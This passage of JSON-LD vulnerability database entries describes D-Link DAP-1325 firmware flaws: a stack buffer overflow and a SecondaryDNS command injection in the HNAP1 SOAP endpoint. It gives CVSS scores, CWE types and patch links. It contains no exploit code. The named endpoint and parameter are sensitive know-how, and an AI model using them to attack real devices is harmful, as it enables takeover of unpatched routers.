"id": "JVNDB-2023-028459"
},
{
"date": "2024-05-03T03:15:53.780000",
"db": "NVD",
"id": "CVE-2023-44407"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-04T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1505"
},
{
"date": "2025-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29321"
},
{
"date": "2025-03-24T02:09:00",
"db": "JVNDB",
"id": "JVNDB-2023-028459"
},
{
"date": "2025-03-12T17:41:05.603000",
"db": "NVD",
"id": "CVE-2023-44407"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DAP-1325\u00a0 Out-of-bounds write vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028459"
}
],
"trust": 0.8
}
}
VAR-202310-0128
Vulnerability from variot - Updated: 2025-11-26 22:54D-Link DAP-1325 get_value_of_key Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1325 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of XML data provided to the HNAP1 SOAP endpoint. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-18824. D-Link Systems, Inc. of DAP-1325 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-1325 is a wireless network extender manufactured by D-Link, primarily used to extend wireless network coverage and support switching between wired and wireless networks or connecting to different wireless networks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202310-0128",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-1325",
"scope": null,
"trust": 2.1,
"vendor": "d link",
"version": null
},
{
"model": "dap-1325",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.09b03"
},
{
"model": "dap-1325",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dap-1325 firmware 1.09b03"
},
{
"model": "dap-1325",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1503"
},
{
"db": "CNVD",
"id": "CNVD-2025-29319"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028460"
},
{
"db": "NVD",
"id": "CVE-2023-44405"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry \"InfoSecDJ\" Janushkevich of Trend Micro Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1503"
}
],
"trust": 0.7
},
"cve": "CVE-2023-44405",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-29319",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-44405",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-44405",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-44405",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2023-44405",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2023-44405",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-44405",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2023-44405",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-29319",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1503"
},
{
"db": "CNVD",
"id": "CNVD-2025-29319"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028460"
},
{
"db": "NVD",
"id": "CVE-2023-44405"
},
{
"db": "NVD",
"id": "CVE-2023-44405"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DAP-1325 get_value_of_key Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1325 routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the handling of XML data provided to the HNAP1 SOAP endpoint. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-18824. D-Link Systems, Inc. of DAP-1325 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-1325 is a wireless network extender manufactured by D-Link, primarily used to extend wireless network coverage and support switching between wired and wireless networks or connecting to different wireless networks",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-44405"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028460"
},
{
"db": "ZDI",
"id": "ZDI-23-1503"
},
{
"db": "CNVD",
"id": "CNVD-2025-29319"
}
],
"trust": 2.79
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-44405",
"trust": 3.9
},
{
"db": "ZDI",
"id": "ZDI-23-1503",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028460",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-18824",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-29319",
"trust": 0.6
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1503"
},
{
"db": "CNVD",
"id": "CNVD-2025-29319"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028460"
},
{
"db": "NVD",
"id": "CVE-2023-44405"
}
]
},
"id": "VAR-202310-0128",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29319"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29319"
}
]
},
"last_update_date": "2025-11-26T22:54:42.147000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for D-Link DAP-1325 get_value_of_key stack buffer overflow remote code execution vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/757551"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29319"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "Stack-based buffer overflow (CWE-121) [ others ]",
"trust": 0.8
},
{
"problemtype": " Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028460"
},
{
"db": "NVD",
"id": "CVE-2023-44405"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.zerodayinitiative.com/advisories/zdi-23-1503/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-44405"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29319"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028460"
},
{
"db": "NVD",
"id": "CVE-2023-44405"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-23-1503"
},
{
"db": "CNVD",
"id": "CNVD-2025-29319"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028460"
},
{
"db": "NVD",
"id": "CVE-2023-44405"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-04T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1503"
},
{
"date": "2025-11-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29319"
},
{
"date": "2025-03-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-028460"
},
{
"date": "2024-05-03T03:15:53.430000",
"db": "NVD",
"id": "CVE-2023-44405"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-04T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1503"
},
{
"date": "2025-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29319"
},
{
"date": "2025-03-24T02:09:00",
"db": "JVNDB",
"id": "JVNDB-2023-028460"
},
{
"date": "2025-03-12T17:40:58.407000",
"db": "NVD",
"id": "CVE-2023-44405"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DAP-1325\u00a0 Out-of-bounds write vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028460"
}
],
"trust": 0.8
}
}
VAR-202309-0337
Vulnerability from variot - Updated: 2025-11-26 22:32D-Link DAP-1325 HNAP SetAPLanSettings SecondaryDNS Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1325 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of a request parameter provided to the HNAP1 SOAP endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-18813. D-Link Systems, Inc. of DAP-1325 The firmware has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-1325 is a wireless network extender manufactured by D-Link, primarily used to extend wireless network coverage and support switching between wired and wireless networks or connecting to different wireless networks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202309-0337",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-1325",
"scope": null,
"trust": 2.1,
"vendor": "d link",
"version": null
},
{
"model": "dap-1325",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.09b03"
},
{
"model": "dap-1325",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dap-1325",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dap-1325 firmware 1.09b03"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1301"
},
{
"db": "CNVD",
"id": "CNVD-2025-29313"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028342"
},
{
"db": "NVD",
"id": "CVE-2023-41193"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry \"InfoSecDJ\" Janushkevich of Trend Micro Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1301"
}
],
"trust": 0.7
},
"cve": "CVE-2023-41193",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-29313",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-41193",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-41193",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-41193",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2023-41193",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2023-41193",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-41193",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2023-41193",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-29313",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1301"
},
{
"db": "CNVD",
"id": "CNVD-2025-29313"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028342"
},
{
"db": "NVD",
"id": "CVE-2023-41193"
},
{
"db": "NVD",
"id": "CVE-2023-41193"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DAP-1325 HNAP SetAPLanSettings SecondaryDNS Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1325 routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the handling of a request parameter provided to the HNAP1 SOAP endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-18813. D-Link Systems, Inc. of DAP-1325 The firmware has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-1325 is a wireless network extender manufactured by D-Link, primarily used to extend wireless network coverage and support switching between wired and wireless networks or connecting to different wireless networks",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-41193"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028342"
},
{
"db": "ZDI",
"id": "ZDI-23-1301"
},
{
"db": "CNVD",
"id": "CNVD-2025-29313"
},
{
"db": "VULMON",
"id": "CVE-2023-41193"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-41193",
"trust": 4.0
},
{
"db": "ZDI",
"id": "ZDI-23-1301",
"trust": 2.6
},
{
"db": "DLINK",
"id": "SAP10351",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028342",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-18813",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-29313",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2023-41193",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1301"
},
{
"db": "CNVD",
"id": "CNVD-2025-29313"
},
{
"db": "VULMON",
"id": "CVE-2023-41193"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028342"
},
{
"db": "NVD",
"id": "CVE-2023-41193"
}
]
},
"id": "VAR-202309-0337",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29313"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29313"
}
]
},
"last_update_date": "2025-11-26T22:32:47.807000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "D-Link has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10351"
},
{
"title": "Patch for D-Link DAP-1325 Secondary DNS Command Injection Remote Code Execution Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/757396"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1301"
},
{
"db": "CNVD",
"id": "CNVD-2025-29313"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "OS Command injection (CWE-78) [ others ]",
"trust": 0.8
},
{
"problemtype": "OS Command injection (CWE-78) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028342"
},
{
"db": "NVD",
"id": "CVE-2023-41193"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10351"
},
{
"trust": 1.9,
"url": "https://www.zerodayinitiative.com/advisories/zdi-23-1301/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-41193"
},
{
"trust": 0.6,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-41193"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1301"
},
{
"db": "CNVD",
"id": "CNVD-2025-29313"
},
{
"db": "VULMON",
"id": "CVE-2023-41193"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028342"
},
{
"db": "NVD",
"id": "CVE-2023-41193"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-23-1301"
},
{
"db": "CNVD",
"id": "CNVD-2025-29313"
},
{
"db": "VULMON",
"id": "CVE-2023-41193"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028342"
},
{
"db": "NVD",
"id": "CVE-2023-41193"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-07T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1301"
},
{
"date": "2025-11-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29313"
},
{
"date": "2025-03-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-028342"
},
{
"date": "2024-05-03T03:15:29.590000",
"db": "NVD",
"id": "CVE-2023-41193"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-07T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1301"
},
{
"date": "2025-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29313"
},
{
"date": "2025-03-13T02:07:00",
"db": "JVNDB",
"id": "JVNDB-2023-028342"
},
{
"date": "2025-03-12T17:34:15.187000",
"db": "NVD",
"id": "CVE-2023-41193"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DAP-1325\u00a0 in the firmware \u00a0OS\u00a0 Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028342"
}
],
